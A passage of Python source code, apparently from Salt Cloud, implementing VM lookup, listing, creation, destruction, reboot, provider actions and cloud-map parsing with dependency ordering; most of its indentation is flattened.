self, names, query="list_nodes", cached=False, profile=None
):
if isinstance(names, six.string_types):
names = [names]
matches = {}
handled_drivers = {}
mapped_providers = self.map_providers_parallel(query, cached=cached)
for alias, drivers in six.iteritems(mapped_providers):
for driver, vms in six.iteritems(drivers):
if driver not in handled_drivers:
handled_drivers[driver] = alias
# When a profile is specified, only return an instance
# that matches the provider specified in the profile.
# This solves the issues when many providers return the
# same instance. For example there may be one provider for
# each availability zone in amazon in the same region, but
# the search returns the same instance for each provider
# because amazon returns all instances in a region, not
# availability zone.
if (
profile
and alias
not in self.opts["profiles"][profile]["provider"].split(":")[0]
):
continue
for vm_name, details in six.iteritems(vms):
# XXX: The logic below can be removed once the aws driver
# is removed
if vm_name not in names:
continue
elif (
driver == "ec2"
and "aws" in handled_drivers
and "aws" in matches[handled_drivers["aws"]]
and vm_name in matches[handled_drivers["aws"]]["aws"]
):
continue
elif (
driver == "aws"
and "ec2" in handled_drivers
and "ec2" in matches[handled_drivers["ec2"]]
and vm_name in matches[handled_drivers["ec2"]]["ec2"]
):
continue
if alias not in matches:
matches[alias] = {}
if driver not in matches[alias]:
matches[alias][driver] = {}
matches[alias][driver][vm_name] = details
return matches
def _optimize_providers(self, providers):
"""
Return an optimized mapping of available providers
"""
new_providers = {}
provider_by_driver = {}
for alias, driver in six.iteritems(providers):
for name, data in six.iteritems(driver):
if name not in provider_by_driver:
provider_by_driver[name] = {}
provider_by_driver[name][alias] = data
for driver, providers_data in six.iteritems(provider_by_driver):
fun = "{0}.optimize_providers".format(driver)
if fun not in self.clouds:
log.debug("The '%s' cloud driver is unable to be optimized.", driver)
for name, prov_data in six.iteritems(providers_data):
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
continue
new_data = self.clouds[fun](providers_data)
if new_data:
for name, prov_data in six.iteritems(new_data):
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
return new_providers
def location_list(self, lookup="all"):
"""
Return a mapping of all location data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_locations".format(driver)
if fun not in self.clouds:
# The capability to gather locations is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the locations information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def image_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_images".format(driver)
if fun not in self.clouds:
# The capability to gather images is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the images information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def size_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_sizes".format(driver)
if fun not in self.clouds:
# The capability to gather sizes is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the sizes information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def provider_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def profile_list(self, provider, lookup="all"):
"""
Return a mapping of all configured profiles
"""
data = {}
lookups = self.lookup_profiles(provider, lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def create_all(self):
"""
Create/Verify the VMs in the VM data
"""
ret = []
for vm_name, vm_details in six.iteritems(self.opts["profiles"]):
ret.append({vm_name: self.create(vm_details)})
return ret
def destroy(self, names, cached=False):
"""
Destroy the named VMs
"""
processed = {}
names = set(names)
matching = self.get_running_by_names(names, cached=cached)
vms_to_destroy = set()
parallel_data = []
for alias, drivers in six.iteritems(matching):
for driver, vms in six.iteritems(drivers):
for name in vms:
if name in names:
vms_to_destroy.add((alias, driver, name))
if self.opts["parallel"]:
parallel_data.append(
{
"opts": self.opts,
"name": name,
"alias": alias,
"driver": driver,
}
)
# destroying in parallel
if self.opts["parallel"] and parallel_data:
# set the pool size based on configuration or default to
# the number of machines we're destroying
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Destroying in parallel mode; " "Cloud pool size: %s", pool_size)
# kick off the parallel destroy
output_multip = enter_mainloop(
_destroy_multiprocessing, parallel_data, pool_size=pool_size
)
# massage the multiprocessing output a bit
ret_multip = {}
for obj in output_multip:
ret_multip.update(obj)
# build up a data structure similar to what the non-parallel
# destroy uses
for obj in parallel_data:
alias = obj["alias"]
driver = obj["driver"]
name = obj["name"]
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret_multip[name]
if name in names:
names.remove(name)
# not destroying in parallel
else:
log.info("Destroying in non-parallel mode.")
for alias, driver, name in vms_to_destroy:
fun = "{0}.destroy".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
ret = self.clouds[fun](name)
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret
if name in names:
names.remove(name)
# now the processed data structure contains the output from either
# the parallel or non-parallel destroy and we should finish up
# with removing minion keys if necessary
for alias, driver, name in vms_to_destroy:
ret = processed[alias][driver][name]
if not ret:
continue
vm_ = {
"name": name,
"profile": None,
"provider": ":".join([alias, driver]),
"driver": driver,
}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
key_file = os.path.join(
self.opts["pki_dir"], "minions", minion_dict.get("id", name)
)
globbed_key_file = glob.glob("{0}.*".format(key_file))
if not os.path.isfile(key_file) and not globbed_key_file:
# There's no such key file!? It might have been renamed
if isinstance(ret, dict) and "newname" in ret:
salt.utils.cloud.remove_key(self.opts["pki_dir"], ret["newname"])
continue
if os.path.isfile(key_file) and not globbed_key_file:
# Single key entry. Remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(key_file)
)
continue
# Since we have globbed matches, there are probably some keys for which their minion
# configuration has append_domain set.
if (
not os.path.isfile(key_file)
and globbed_key_file
and len(globbed_key_file) == 1
):
# Single entry, let's remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(globbed_key_file[0])
)
continue
# Since we can't get the profile or map entry used to create
# the VM, we can't also get the append_domain setting.
# And if we reached this point, we have several minion keys
            # whose name starts with the machine name we're deleting.
# We need to ask one by one!?
print(
"There are several minion keys who's name starts "
"with '{0}'. We need to ask you which one should be "
"deleted:".format(name)
)
while True:
for idx, filename in enumerate(globbed_key_file):
print(" {0}: {1}".format(idx, os.path.basename(filename)))
selection = input("Which minion key should be deleted(number)? ")
try:
selection = int(selection)
                except ValueError:
                    print("'{0}' is not a valid selection.".format(selection))
                    continue
try:
filename = os.path.basename(globbed_key_file.pop(selection))
except Exception: # pylint: disable=broad-except
continue
delete = input("Delete '{0}'? [Y/n]? ".format(filename))
if delete == "" or delete.lower().startswith("y"):
salt.utils.cloud.remove_key(self.opts["pki_dir"], filename)
print("Deleted '{0}'".format(filename))
break
print("Did not delete '{0}'".format(filename))
break
if names and not processed:
# These machines were asked to be destroyed but could not be found
raise SaltCloudSystemExit(
"The following VM's were not found: {0}".format(", ".join(names))
)
elif names and processed:
processed["Not Found"] = names
elif not processed:
raise SaltCloudSystemExit("No machines were destroyed!")
return processed
def reboot(self, names):
"""
Reboot the named VMs
"""
ret = []
pmap = self.map_providers_parallel()
acts = {}
for prov, nodes in six.iteritems(pmap):
acts[prov] = []
for node in nodes:
if node in names:
acts[prov].append(node)
for prov, names_ in six.iteritems(acts):
fun = "{0}.reboot".format(prov)
for name in names_:
ret.append({name: self.clouds[fun](name)})
return ret
def create(self, vm_, local_master=True):
"""
Create a single VM
"""
output = {}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
alias, driver = vm_["provider"].split(":")
fun = "{0}.create".format(driver)
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
vm_["name"],
vm_["provider"],
driver,
)
return
deploy = salt.config.get_cloud_config_value("deploy", vm_, self.opts)
make_master = salt.config.get_cloud_config_value("make_master", vm_, self.opts)
if deploy:
if not make_master and "master" not in minion_dict:
log.warning(
"There's no master defined on the '%s' VM settings.", vm_["name"]
)
if "pub_key" not in vm_ and "priv_key" not in vm_:
log.debug("Generating minion keys for '%s'", vm_["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["pub_key"] = pub
vm_["priv_key"] = priv
else:
# Note(pabelanger): We still reference pub_key and priv_key when
# deploy is disabled.
vm_["pub_key"] = None
vm_["priv_key"] = None
key_id = minion_dict.get("id", vm_["name"])
domain = vm_.get("domain")
if vm_.get("use_fqdn") and domain:
minion_dict["append_domain"] = domain
if "append_domain" in minion_dict:
key_id = ".".join([key_id, minion_dict["append_domain"]])
if make_master is True and "master_pub" not in vm_ and "master_pem" not in vm_:
log.debug("Generating the master keys for '%s'", vm_["name"])
master_priv, master_pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["master_pub"] = master_pub
vm_["master_pem"] = master_priv
if local_master is True and deploy is True:
# Accept the key on the local master
salt.utils.cloud.accept_key(self.opts["pki_dir"], vm_["pub_key"], key_id)
vm_["os"] = salt.config.get_cloud_config_value("script", vm_, self.opts)
try:
vm_["inline_script"] = salt.config.get_cloud_config_value(
"inline_script", vm_, self.opts
)
except KeyError:
pass
try:
alias, driver = vm_["provider"].split(":")
func = "{0}.create".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
output = self.clouds[func](vm_)
if output is not False and "sync_after_install" in self.opts:
if self.opts["sync_after_install"] not in (
"all",
"modules",
"states",
"grains",
):
log.error("Bad option for sync_after_install")
return output
# A small pause helps the sync work more reliably
time.sleep(3)
start = int(time.time())
while int(time.time()) < start + 60:
# We'll try every <timeout> seconds, up to a minute
                    mopts_ = salt.config.DEFAULT_MASTER_OPTS.copy()  # avoid mutating the shared defaults
conf_path = "/".join(self.opts["conf_file"].split("/")[:-1])
mopts_.update(
salt.config.master_config(os.path.join(conf_path, "master"))
)
client = salt.client.get_local_client(mopts=mopts_)
ret = client.cmd(
vm_["name"],
"saltutil.sync_{0}".format(self.opts["sync_after_install"]),
timeout=self.opts["timeout"],
)
if ret:
log.info(
six.u(
"Synchronized the following dynamic modules: " " {0}"
).format(ret)
)
break
except KeyError as exc:
log.exception(
"Failed to create VM %s. Configuration value %s needs " "to be set",
vm_["name"],
exc,
)
# If it's a map then we need to respect the 'requires'
# so we do it later
try:
opt_map = self.opts["map"]
except KeyError:
opt_map = False
if self.opts["parallel"] and self.opts["start_action"] and not opt_map:
log.info("Running %s on %s", self.opts["start_action"], vm_["name"])
client = salt.client.get_local_client(mopts=self.opts)
action_out = client.cmd(
vm_["name"],
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
)
output["ret"] = action_out
return output
@staticmethod
def vm_config(name, main, provider, profile, overrides):
"""
Create vm config.
:param str name: The name of the vm
:param dict main: The main cloud config
:param dict provider: The provider config
:param dict profile: The profile config
:param dict overrides: The vm's config overrides
"""
vm = main.copy()
vm = salt.utils.dictupdate.update(vm, provider)
vm = salt.utils.dictupdate.update(vm, profile)
vm.update(overrides)
vm["name"] = name
return vm
def extras(self, extra_):
"""
Extra actions
"""
output = {}
alias, driver = extra_["provider"].split(":")
fun = "{0}.{1}".format(driver, extra_["action"])
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
extra_["name"],
extra_["provider"],
driver,
)
return
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=extra_["provider"]
):
output = self.clouds[fun](**extra_)
except KeyError as exc:
log.exception(
"Failed to perform %s.%s on %s. "
"Configuration value %s needs to be set",
extra_["provider"],
extra_["action"],
extra_["name"],
exc,
)
return output
def run_profile(self, profile, names, vm_overrides=None):
"""
Parse over the options passed on the command line and determine how to
handle them
"""
if profile not in self.opts["profiles"]:
msg = "Profile {0} is not defined".format(profile)
log.error(msg)
return {"Error": msg}
ret = {}
if not vm_overrides:
vm_overrides = {}
try:
with salt.utils.files.fopen(self.opts["conf_file"], "r") as mcc:
main_cloud_config = salt.utils.yaml.safe_load(mcc)
if not main_cloud_config:
main_cloud_config = {}
except KeyError:
main_cloud_config = {}
except IOError:
main_cloud_config = {}
if main_cloud_config is None:
main_cloud_config = {}
mapped_providers = self.map_providers_parallel()
profile_details = self.opts["profiles"][profile]
vms = {}
for prov, val in six.iteritems(mapped_providers):
prov_name = next(iter(val))
for node in mapped_providers[prov][prov_name]:
vms[node] = mapped_providers[prov][prov_name][node]
vms[node]["provider"] = prov
vms[node]["driver"] = prov_name
alias, driver = profile_details["provider"].split(":")
provider_details = self.opts["providers"][alias][driver].copy()
del provider_details["profiles"]
for name in names:
if name in vms:
prov = vms[name]["provider"]
driv = vms[name]["driver"]
msg = "{0} already exists under {1}:{2}".format(name, prov, driv)
log.error(msg)
ret[name] = {"Error": msg}
continue
vm_ = self.vm_config(
name,
main_cloud_config,
provider_details,
profile_details,
vm_overrides,
)
if self.opts["parallel"]:
process = multiprocessing.Process(target=self.create, args=(vm_,))
process.start()
ret[name] = {
"Provisioning": "VM being provisioned in parallel. "
"PID: {0}".format(process.pid)
}
continue
try:
# No need to inject __active_provider_name__ into the context
# here because self.create takes care of that
ret[name] = self.create(vm_)
if not ret[name]:
ret[name] = {"Error": "Failed to deploy VM"}
if len(names) == 1:
raise SaltCloudSystemExit("Failed to deploy VM")
continue
if self.opts.get("show_deploy_args", False) is False:
ret[name].pop("deploy_kwargs", None)
except (SaltCloudSystemExit, SaltCloudConfigError) as exc:
if len(names) == 1:
raise
ret[name] = {"Error": str(exc)}
return ret
def do_action(self, names, kwargs):
"""
Perform an action on a VM which may be specific to this cloud provider
"""
ret = {}
invalid_functions = {}
names = set(names)
for alias, drivers in six.iteritems(self.map_providers_parallel()):
if not names:
break
for driver, vms in six.iteritems(drivers):
if not names:
break
valid_function = True
fun = "{0}.{1}".format(driver, self.opts["action"])
if fun not in self.clouds:
log.info("'%s()' is not available. Not actioning...", fun)
valid_function = False
for vm_name, vm_details in six.iteritems(vms):
if not names:
break
if vm_name not in names:
if not isinstance(vm_details, dict):
vm_details = {}
if "id" in vm_details and vm_details["id"] in names:
vm_name = vm_details["id"]
else:
log.debug(
"vm:%s in provider:%s is not in name " "list:'%s'",
vm_name,
driver,
names,
)
continue
# Build the dictionary of invalid functions with their associated VMs.
if valid_function is False:
if invalid_functions.get(fun) is None:
invalid_functions.update({fun: []})
invalid_functions[fun].append(vm_name)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
if alias not in ret:
ret[alias] = {}
if driver not in ret[alias]:
ret[alias][driver] = {}
# Clean kwargs of "__pub_*" data before running the cloud action call.
# Prevents calling positional "kwarg" arg before "call" when no kwarg
# argument is present in the cloud driver function's arg spec.
kwargs = salt.utils.args.clean_kwargs(**kwargs)
if kwargs:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, kwargs, call="action"
)
else:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, call="action"
)
names.remove(vm_name)
# Set the return information for the VMs listed in the invalid_functions dict.
missing_vms = set()
if invalid_functions:
ret["Invalid Actions"] = invalid_functions
invalid_func_vms = set()
for key, val in six.iteritems(invalid_functions):
invalid_func_vms = invalid_func_vms.union(set(val))
# Find the VMs that are in names, but not in set of invalid functions.
missing_vms = names.difference(invalid_func_vms)
if missing_vms:
ret["Not Found"] = list(missing_vms)
ret["Not Actioned/Not Running"] = list(names)
if not names:
return ret
        # Don't return missing VM information for invalid functions until after we've had a
        # chance to return successful actions. If a function is valid for one driver, but
        # not another, we want to make sure the successful action is returned properly.
if missing_vms:
return ret
        # If we reach this point, the Not Actioned and Not Found lists will be the same,
        # but we want to list both for clarity/consistency with the invalid functions lists.
ret["Not Actioned/Not Running"] = list(names)
ret["Not Found"] = list(names)
return ret
def do_function(self, prov, func, kwargs):
"""
Perform a function against a cloud provider
"""
matches = self.lookup_providers(prov)
if len(matches) > 1:
raise SaltCloudSystemExit(
"More than one results matched '{0}'. Please specify "
"one of: {1}".format(
prov,
", ".join(
["{0}:{1}".format(alias, driver) for (alias, driver) in matches]
),
)
)
alias, driver = matches.pop()
fun = "{0}.{1}".format(driver, func)
if fun not in self.clouds:
raise SaltCloudSystemExit(
"The '{0}' cloud provider alias, for the '{1}' driver, does "
"not define the function '{2}'".format(alias, driver, func)
)
log.debug("Trying to execute '%s' with the following kwargs: %s", fun, kwargs)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if kwargs:
return {
alias: {driver: self.clouds[fun](call="function", kwargs=kwargs)}
}
return {alias: {driver: self.clouds[fun](call="function")}}
def __filter_non_working_providers(self):
"""
Remove any mis-configured cloud providers from the available listing
"""
for alias, drivers in six.iteritems(self.opts["providers"].copy()):
for driver in drivers.copy():
fun = "{0}.get_configured_provider".format(driver)
if fun not in self.clouds:
# Mis-configured provider that got removed?
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias, could not be loaded. "
"Please check your provider configuration files and "
"ensure all required dependencies are installed "
"for the '%s' driver.\n"
"In rare cases, this could indicate the '%s()' "
"function could not be found.\nRemoving '%s' from "
"the available providers list",
driver,
alias,
driver,
fun,
driver,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if self.clouds[fun]() is False:
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias is not properly "
"configured. Removing it from the available "
"providers list.",
driver,
alias,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
class Map(Cloud):
"""
Create a VM stateful map execution object
"""
def __init__(self, opts):
Cloud.__init__(self, opts)
self.rendered_map = self.read()
def interpolated_map(self, query="list_nodes", cached=False):
rendered_map = self.read().copy()
interpolated_map = {}
for profile, mapped_vms in six.iteritems(rendered_map):
names = set(mapped_vms)
if profile not in self.opts["profiles"]:
if "Errors" not in interpolated_map:
interpolated_map["Errors"] = {}
msg = (
"No provider for the mapped '{0}' profile was found. "
"Skipped VMS: {1}".format(profile, ", ".join(names))
)
log.info(msg)
interpolated_map["Errors"][profile] = msg
continue
matching = self.get_running_by_names(names, query, cached)
for alias, drivers in six.iteritems(matching):
for driver, vms in six.iteritems(drivers):
for vm_name, vm_details in six.iteritems(vms):
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = vm_details
try:
names.remove(vm_name)
except KeyError:
# If it's not there, then our job is already done
pass
if not names:
continue
profile_details = self.opts["profiles"][profile]
alias, driver = profile_details["provider"].split(":")
for vm_name in names:
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = "Absent"
return interpolated_map
def delete_map(self, query=None):
query_map = self.interpolated_map(query=query)
for alias, drivers in six.iteritems(query_map.copy()):
for driver, vms in six.iteritems(drivers.copy()):
for vm_name, vm_details in six.iteritems(vms.copy()):
if vm_details == "Absent":
query_map[alias][driver].pop(vm_name)
if not query_map[alias][driver]:
query_map[alias].pop(driver)
if not query_map[alias]:
query_map.pop(alias)
return query_map
def get_vmnames_by_action(self, action):
query_map = self.interpolated_map("list_nodes")
matching_states = {
"start": ["stopped"],
"stop": ["running", "active"],
"reboot": ["running", "active"],
}
vm_names = []
for alias, drivers in six.iteritems(query_map):
for driver, vms in six.iteritems(drivers):
for vm_name, vm_details in six.iteritems(vms):
                    # Only certain actions are supported in this case. Those actions are the
# "Global" salt-cloud actions defined in the "matching_states" dictionary above.
# If a more specific action is passed in, we shouldn't stack-trace - exit gracefully.
try:
state_action = matching_states[action]
except KeyError:
log.error(
"The use of '%s' as an action is not supported "
"in this context. Only 'start', 'stop', and "
"'reboot' are supported options.",
action,
)
raise SaltCloudException()
if (
vm_details != "Absent"
and vm_details["state"].lower() in state_action
):
vm_names.append(vm_name)
return vm_names
def read(self):
"""
Read in the specified map and return the map structure
"""
map_ = None
if self.opts.get("map", None) is None:
if self.opts.get("map_data", None) is None:
if self.opts.get("map_pillar", None) is None:
pass
elif self.opts.get("map_pillar") not in self.opts.get("maps"):
log.error(
"The specified map not found in pillar at " "'cloud:maps:%s'",
self.opts["map_pillar"],
)
raise SaltCloudNotFound()
else:
# 'map_pillar' is provided, try to use it
map_ = self.opts["maps"][self.opts.get("map_pillar")]
else:
# 'map_data' is provided, try to use it
map_ = self.opts["map_data"]
else:
# 'map' is provided, try to use it
local_minion_opts = copy.deepcopy(self.opts)
local_minion_opts["file_client"] = "local"
self.minion = salt.minion.MasterMinion(local_minion_opts)
if not os.path.isfile(self.opts["map"]):
if not (self.opts["map"]).startswith("salt://"):
log.error(
"The specified map file does not exist: '%s'", self.opts["map"]
)
raise SaltCloudNotFound()
if (self.opts["map"]).startswith("salt://"):
cached_map = self.minion.functions["cp.cache_file"](self.opts["map"])
else:
cached_map = self.opts["map"]
try:
renderer = self.opts.get("renderer", "jinja|yaml")
rend = salt.loader.render(self.opts, {})
blacklist = self.opts.get("renderer_blacklist")
whitelist = self.opts.get("renderer_whitelist")
map_ = compile_template(
cached_map, rend, renderer, blacklist, whitelist
)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Rendering map %s failed, render error:\n%s",
self.opts["map"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {}
if "include" in map_:
map_ = salt.config.include_config(map_, self.opts["map"], verbose=False)
if not map_:
return {}
# Create expected data format if needed
for profile, mapped in six.iteritems(map_.copy()):
if isinstance(mapped, (list, tuple)):
entries = {}
for mapping in mapped:
if isinstance(mapping, six.string_types):
# Foo:
# - bar1
# - bar2
mapping = {mapping: None}
for name, overrides in six.iteritems(mapping):
if overrides is None or isinstance(overrides, bool):
# Foo:
# - bar1:
# - bar2:
overrides = {}
try:
overrides.setdefault("name", name)
except AttributeError:
log.error(
"Cannot use 'name' as a minion id in a cloud map as it "
"is a reserved word. Please change 'name' to a different "
"minion id reference."
)
return {}
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, dict):
# Convert the dictionary mapping to a list of dictionaries
# Foo:
# bar1:
# grains:
# foo: bar
# bar2:
# grains:
# foo: bar
entries = {}
for name, overrides in six.iteritems(mapped):
overrides.setdefault("name", name)
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, six.string_types):
# If it's a single string entry, let's make iterable because of
# the next step
mapped = [mapped]
map_[profile] = {}
for name in mapped:
map_[profile][name] = {"name": name}
return map_
def _has_loop(self, dmap, seen=None, val=None):
if seen is None:
for values in six.itervalues(dmap["create"]):
seen = []
try:
machines = values["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
else:
if val in seen:
return True
seen.append(val)
try:
machines = dmap["create"][val]["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
return False
def _calcdep(self, dmap, machine, data, level):
try:
deplist = data["requires"]
except KeyError:
return level
levels = []
for name in deplist:
try:
data = dmap["create"][name]
except KeyError:
try:
data = dmap["existing"][name]
except KeyError:
msg = "Missing dependency in cloud map"
log.error(msg)
raise SaltCloudException(msg)
levels.append(self._calcdep(dmap, name, data, level))
level = max(levels) + 1
return level
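    # Worked example (added): if the map defines web1 with requires: [db1]
    # and db1 with no requires, then
    #   _calcdep(dmap, 'db1',  dmap['create']['db1'],  0) == 0
    #   _calcdep(dmap, 'web1', dmap['create']['web1'], 0) == 1
    # so run_map() orders db1 before web1 when sorting create_list by level.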
def map_data(self, cached=False):
"""
Create a data map of what to execute on
"""
ret = {"create": {}}
pmap = self.map_providers_parallel(cached=cached)
exist = set()
defined = set()
rendered_map = copy.deepcopy(self.rendered_map)
for profile_name, nodes in six.iteritems(rendered_map):
if profile_name not in self.opts["profiles"]:
msg = (
"The required profile, '{0}', defined in the map "
"does not exist. The defined nodes, {1}, will not "
"be created.".format(
profile_name, ", ".join("'{0}'".format(node) for node in nodes)
)
)
log.error(msg)
if "errors" not in ret:
ret["errors"] = {}
ret["errors"][profile_name] = msg
continue
profile_data = self.opts["profiles"].get(profile_name)
for nodename, overrides in six.iteritems(nodes):
# Get associated provider data, in case something like size
# or image is specified in the provider file. See issue #32510.
if (
"provider" in overrides
and overrides["provider"] != profile_data["provider"]
):
alias, driver = overrides.get("provider").split(":")
else:
alias, driver = profile_data.get("provider").split(":")
provider_details = copy.deepcopy(self.opts["providers"][alias][driver])
del provider_details["profiles"]
# Update the provider details information with profile data
# Profile data and node overrides should override provider data, if defined.
# This keeps map file data definitions consistent with -p usage.
salt.utils.dictupdate.update(provider_details, profile_data)
nodedata = copy.deepcopy(provider_details)
# Update profile data with the map overrides
for setting in ("grains", "master", "minion", "volumes", "requires"):
deprecated = "map_{0}".format(setting)
if deprecated in overrides:
log.warning(
"The use of '%s' on the '%s' mapping has "
"been deprecated. The preferred way now is to "
"just define '%s'. For now, salt-cloud will do "
"the proper thing and convert the deprecated "
"mapping into the preferred one.",
deprecated,
nodename,
setting,
)
overrides[setting] = overrides.pop(deprecated)
# merge minion grains from map file
if (
"minion" in overrides
and "minion" in nodedata
and "grains" in overrides["minion"]
and "grains" in nodedata["minion"]
):
nodedata["minion"]["grains"].update(overrides["minion"]["grains"])
del overrides["minion"]["grains"]
# remove minion key if now is empty dict
if not overrides["minion"]:
del overrides["minion"]
nodedata = salt.utils.dictupdate.update(nodedata, overrides)
# Add the computed information to the return data
ret["create"][nodename] = nodedata
# Add the node name to the defined set
alias, driver = nodedata["provider"].split(":")
defined.add((alias, driver, nodename))
def get_matching_by_name(name):
matches = {}
for alias, drivers in six.iteritems(pmap):
for driver, vms in six.iteritems(drivers):
for vm_name, details in six.iteritems(vms):
if vm_name == name and driver not in matches:
matches[driver] = details["state"]
return matches
for alias, drivers in six.iteritems(pmap):
for driver, vms in six.iteritems(drivers):
for name, details in six.iteritems(vms):
exist.add((alias, driver, name))
if name not in ret["create"]:
continue
# The machine is set to be created. Does it already exist?
matching = get_matching_by_name(name)
if not matching:
continue
# A machine by the same name exists
for item in matching:
if name not in ret["create"]:
# Machine already removed
break
log.warning(
"'%s' already exists, removing from " "the create map.",
name,
)
if "existing" not in ret:
ret["existing"] = {}
ret["existing"][name] = ret["create"].pop(name)
if "hard" in self.opts and self.opts["hard"]:
if self.opts["enable_hard_maps"] is False:
raise SaltCloudSystemExit(
"The --hard map can be extremely dangerous to use, "
"and therefore must explicitly be enabled in the main "
"configuration file, by setting 'enable_hard_maps' "
"to True"
)
# Hard maps are enabled, Look for the items to delete.
ret["destroy"] = exist.difference(defined)
return ret
def run_map(self, dmap):
"""
Execute the contents of the VM map
"""
if self._has_loop(dmap):
msg = "Uh-oh, that cloud map has a dependency loop!"
log.error(msg)
raise SaltCloudException(msg)
# Go through the create list and calc dependencies
for key, val in six.iteritems(dmap["create"]):
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["create"][key]["level"] = level
try:
existing_list = six.iteritems(dmap["existing"])
except KeyError:
existing_list = six.iteritems({})
for key, val in existing_list:
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["existing"][key]["level"] = level
# Now sort the create list based on dependencies
create_list = sorted(six.iteritems(dmap["create"]), key=lambda x: x[1]["level"])
output = {}
if self.opts["parallel"]:
parallel_data = []
master_name = None
master_minion_name = None
master_host = None
master_finger = None
try:
master_name, master_profile = next(
(
(name, profile)
for name, profile in create_list
if profile.get("make_master", False) is True
)
)
master_minion_name = master_name
log.debug("Creating new master '%s'", master_name)
if (
salt.config.get_cloud_config_value("deploy", master_profile, self.opts)
is False
):
raise SaltCloudSystemExit(
"Cannot proceed with 'make_master' when salt deployment "
"is disabled(ex: --no-deploy)."
)
# Generate the master keys
